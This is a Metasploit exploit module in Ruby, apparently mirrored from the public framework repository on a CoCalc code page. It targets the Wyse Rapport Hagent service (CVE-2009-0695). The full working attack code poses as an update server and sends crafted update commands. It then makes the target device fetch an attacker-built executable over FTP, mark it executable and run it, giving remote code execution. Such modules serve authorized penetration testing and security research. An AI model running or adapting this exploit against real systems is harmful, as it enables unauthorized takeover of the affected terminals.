CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'timeout'67class MetasploitModule < Msf::Exploit::Remote8Rank = ExcellentRanking910include Msf::Exploit::Remote::Tcp11include Msf::Exploit::Remote::FtpServer12include Msf::Exploit::EXE1314def initialize(info = {})15super(update_info(info,16'Name' => 'Wyse Rapport Hagent Fake Hserver Command Execution',17'Description' => %q{18This module exploits the Wyse Rapport Hagent service by pretending to19be a legitimate server. This process involves starting both HTTP and20FTP services on the attacker side, then contacting the Hagent service of21the target and indicating that an update is available. The target will22then download the payload wrapped in an executable from the FTP service.23},24'Stance' => Msf::Exploit::Stance::Aggressive,25'Author' => 'kf',26'References' =>27[28['CVE', '2009-0695'],29['OSVDB', '55839'],30['US-CERT-VU', '654545'],31['URL', 'http://snosoft.blogspot.com/'],32['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/']33],34'Privileged' => true,35'Payload' =>36{37'Space' => 2048,38'BadChars' => '',39},40'DefaultOptions' =>41{42'EXITFUNC' => 'process',43},44'Platform' => %w{ win linux },45'Targets' =>46[47[ 'Windows XPe x86',{'Platform' => 'win',}],48[ 'Wyse Linux x86', {'Platform' => 'linux',}],49],50'DefaultTarget' => 0,51'DisclosureDate' => '2009-07-10'52))5354register_options(55[56OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]),57Opt::RPORT(80),58])59end606162def exploit6364if(datastore['SRVPORT'].to_i != 21)65print_error("This exploit requires the FTP service to run on port 21")66return67end6869# Connect to the target service70print_status("Connecting to the target")71connect()7273# Start the FTP service74print_status("Starting the FTP server")75start_service()7677# Create the executable with our payload78print_status("Generating the EXE")79@exe_file = generate_payload_exe80if target['Platform'] == 'win'81maldir = "C:\\" # Windows82malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe"83co = "XP"84elsif target['Platform'] == 'linux'85maldir = "//tmp//" # Linux86malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin"87co = "LXS"88end89@exe_sent = false9091# Start the HTTP service92print_status("Starting the HTTP service")93wdmserver = Rex::Socket::TcpServer.create({94'Context' => {95'Msf' => framework,96'MsfExploit' => self97}98})99100# Let this close automatically101add_socket(wdmserver)102103wdmserver_port = wdmserver.getsockname[2]104print_status("Starting the HTTP service on port #{wdmserver_port}")105106107fakerapport = Rex::Socket.source_address(rhost)108fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0]109mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|"110111# FTP Credentials112ftpserver = Rex::Socket.source_address(rhost)113ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1)114ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1)115ftpport = 21116ftpsecure = '0'117118incr = 10119pwn1 =120"&UP0|&SI=1|UR=9" +121"|CO \x0f#{co}\x0f|#{incr}" +122# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +123"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"124125pwn2 = "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"126127pwn3 =128"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +129# "|RB|#{incr+1}" +130# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +131#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +132# FTP Paramaters133"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" +134"|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +135"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" +136"|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +137# No clue138"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"139140if target['Platform'] == 'win'141pwn = pwn1 + pwn3142elsif target['Platform'] == 'linux'143pwn = pwn1 + pwn2 + pwn3144end145# Send the malicious request146sock.put(mal)147148# Download some response data149resp = sock.get_once(-1, 10)150print_status("Received: #{resp}")151152if not resp153print_error("No reply from the target, this may not be a vulnerable system")154return155end156157print_status("Waiting on a connection to the HTTP service")158begin159Timeout.timeout(190) do160done = false161while (not done and session = wdmserver.accept)162req = session.recvfrom(2000)[0]163next if not req164next if req.empty?165print_status("HTTP Request: #{req.split("\n")[0].strip}")166167case req168when /V01/169print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")170res = pwn171when /V02/172print_status("++ device sending V02 query...")173res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"174done = true175176when /V55/177print_status("++ device sending V55 query...")178res = pwn179when /POST/ # PUT is used for non encrypted requests.180print_status("++ device sending V55 query...")181res = pwn182done = true183else184print_status("+++ sending generic response...")185res = pwn186end187188print_status("Sending reply: #{res}")189session.put(res)190session.close191end192end193rescue ::Timeout::Error194print_status("Timed out waiting on the HTTP request")195wdmserver.close196disconnect197return198end199200print_status("Waiting on the FTP request...")201stime = Time.now.to_f202while(not @exe_sent)203break if (stime + 90 < Time.now.to_f)204select(nil, nil, nil, 0.25)205end206207if(not @exe_sent)208print_status("No executable sent :(")209end210211wdmserver.close()212213handler214disconnect215end216217def on_client_command_retr(c,arg)218print_status("#{@state[c][:name]} FTP download request for #{arg}")219conn = establish_data_connection(c)220if(not conn)221c.put("425 Can't build data connection\r\n")222return223end224225c.put("150 Opening BINARY mode data connection for #{arg}\r\n")226conn.put(@exe_file)227c.put("226 Transfer complete.\r\n")228conn.close229@exe_sent = true230end231232def on_client_command_size(c,arg)233print_status("#{@state[c][:name]} FTP size request for #{arg}")234c.put("213 #{@exe_file.length}\r\n")235end236237238end239240241